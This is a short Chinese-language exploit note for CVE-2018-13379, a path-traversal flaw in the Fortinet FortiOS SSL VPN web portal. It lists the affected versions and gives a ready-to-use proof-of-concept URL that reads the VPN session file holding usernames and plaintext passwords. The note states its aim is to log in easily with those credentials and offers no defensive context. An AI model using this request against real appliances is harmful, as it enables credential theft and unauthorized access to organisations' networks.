影响版本

Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 under SSL VPN web portal

利用CVE-2018-13379来泄露会话文件。这个session文件中包含一些有价值的信息，比如用户名以及明文密码，这样我们就可以轻松登录。

poc

https://x.x.x.x/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

这里我们需要猜一下哪个是用户名和密码